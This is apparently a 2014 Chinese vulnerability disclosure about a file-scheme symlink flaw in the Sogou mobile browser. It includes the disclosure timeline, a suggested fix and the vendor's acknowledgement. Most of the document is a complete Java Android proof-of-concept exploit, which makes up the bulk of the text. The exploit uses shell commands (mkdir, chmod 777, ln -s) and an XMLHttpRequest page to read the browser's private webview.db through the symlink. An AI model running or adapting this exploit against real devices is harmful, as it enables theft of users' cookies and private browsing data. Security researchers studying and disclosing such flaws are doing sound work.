2014-05-20: 细节已通知厂商并且等待厂商处理中 2014-05-20: 厂商已经确认,细节仅向厂商公开 2014-05-23: 细节向第三方安全合作伙伴开放 2014-07-14: 细节向核心白帽子及相关领域专家公开 2014-07-24: 细节向普通白帽子公开 2014-08-03: 细节向实习白帽子公开 2014-08-18: 细节向公众公开
搜狗手机浏览器逻辑缺陷可获取隐私信息
搜狗手机浏览器在file域下存在逻辑缺陷:恶意应用可以利用符号链接绕过同源策略,获取用户cookie等隐私信息。
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

/**
 * Proof-of-concept activity from the report, demonstrating the file-scheme
 * logic flaw in the Sogou mobile browser.
 *
 * <p>What the code shows, step by step:
 * <ol>
 *   <li>An HTML page is staged in this app's own directory, which is then
 *       made world-accessible.</li>
 *   <li>The target browser's {@code BrowserActivity} is started through an
 *       explicit intent carrying a {@code file://} URL to that page.</li>
 *   <li>While the page is open, the staged file is replaced by a symbolic
 *       link to the browser's private {@code webview.db}.</li>
 *   <li>The page's script re-requests its own URL after a delay, so the read
 *       goes through the symlink with the browser's privileges.</li>
 * </ol>
 *
 * <p>Review notes for defenders: the three preconditions visible here are
 * (a) an activity that accepts a {@code file://} URL from another app's
 * intent, (b) script on a {@code file://} page being allowed to fetch its own
 * URL, and (c) the browser following a symlink that lives in a directory
 * another app controls. The report's suggested fix addresses (c) by
 * restricting symlinks under the file scheme.
 * NOTE(review): on WebView-based browsers,
 * {@code WebSettings.setAllowFileAccessFromFileURLs(false)} is the usual
 * control for (b) — confirm against the browser's actual configuration.
 */
public class MainActivity extends Activity {

    /** Package name of this proof-of-concept app. */
    public static final String MY_PKG = "com.example.testsougou";

    /** Staging directory inside this app's data directory. */
    public static final String MY_TMP_DIR = "/data/data/" + MY_PKG + "/tmp/";

    /** Package name of the browser under test. */
    public static final String TARGET_PKG = "sogou.mobile.explorer";

    /** File inside the browser's private data directory that the symlink points at. */
    public static final String TARGET_FILE_PATH =
            "/data/data/" + TARGET_PKG + "/databases/webview.db";

    /**
     * Page content: after an 8 second timer it requests its own URL with
     * XMLHttpRequest, appends the response text to the body and shows it in
     * an alert.
     */
    public static final String HTML =
            "<body>"
            + "<u>Wait a few seconds.</u>"
            + "<script>"
            + "var d = document;"
            + "function doitjs() {"
            + " var xhr = new XMLHttpRequest;"
            + " xhr.onload = function() {"
            + " var txt = xhr.responseText;"
            + " d.body.appendChild(d.createTextNode(txt));"
            + " alert(txt);"
            + " };"
            + " xhr.open('GET', d.URL);"
            + " xhr.send(null);"
            + "}"
            + "setTimeout(doitjs, 8000);"
            + "</script>"
            + "</body>";

    /** Runs the demonstration as soon as the activity is created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        doit();
    }

    /**
     * Stages the page, opens it in the target browser, then swaps the staged
     * file for a symlink to {@link #TARGET_FILE_PATH}.
     *
     * <p>The sleeps total about 5 seconds, which is shorter than the page's
     * 8 second timer, so the swap happens before the page re-requests its
     * URL. Any failure along the way is silently ignored.
     */
    public void doit() {
        // Randomised file name for the staged page inside the staging directory.
        final String stagedPage = MY_TMP_DIR + "A" + Math.random() + ".html";
        try {
            // Write the page and open up the staging directory
            // (presumably so the browser's process can read it — confirm).
            cmdexec("mkdir " + MY_TMP_DIR);
            cmdexec("echo \"" + HTML + "\" > " + stagedPage);
            cmdexec("chmod -R 777 " + MY_TMP_DIR);
            Thread.sleep(1000);

            // Have the target browser load the staged page over file://.
            invokeChrome("file://" + stagedPage);
            Thread.sleep(4000);

            // Swap the staged page for a symlink into the browser's private data.
            cmdexec("rm " + stagedPage);
            cmdexec("ln -s " + TARGET_FILE_PATH + " " + stagedPage);
        } catch (Exception ignored) {
            // The original PoC deliberately drops every error here.
        }
    }

    /**
     * Opens {@code url} in the target browser via an explicit
     * {@code ACTION_VIEW} intent addressed to its {@code BrowserActivity}.
     * Despite the method name, the component addressed is the Sogou browser,
     * not Chrome.
     *
     * @param url the URL to hand to the browser
     */
    public void invokeChrome(String url) {
        startActivity(
                new Intent(Intent.ACTION_VIEW, Uri.parse(url))
                        .setClassName(TARGET_PKG, "sogou.mobile.explorer.BrowserActivity"));
    }

    /**
     * Starts {@code cmd} through {@code /system/bin/sh -c}. The call does not
     * wait for the process to finish and ignores every failure.
     *
     * @param cmd the shell command line to run
     */
    public void cmdexec(String cmd) {
        try {
            Runtime.getRuntime().exec(new String[] {"/system/bin/sh", "-c", cmd});
        } catch (Exception ignored) {
            // The original PoC deliberately drops every error here.
        }
    }
}
对file域下的符号链接进行限制:加载file://资源前先解析其真实路径,拒绝解析结果指向应用私有目录的请求。
危害等级:高
漏洞Rank:10
确认时间:2014-05-20 14:07
收到,感谢支持,欢迎到SGSRC提交漏洞!
暂无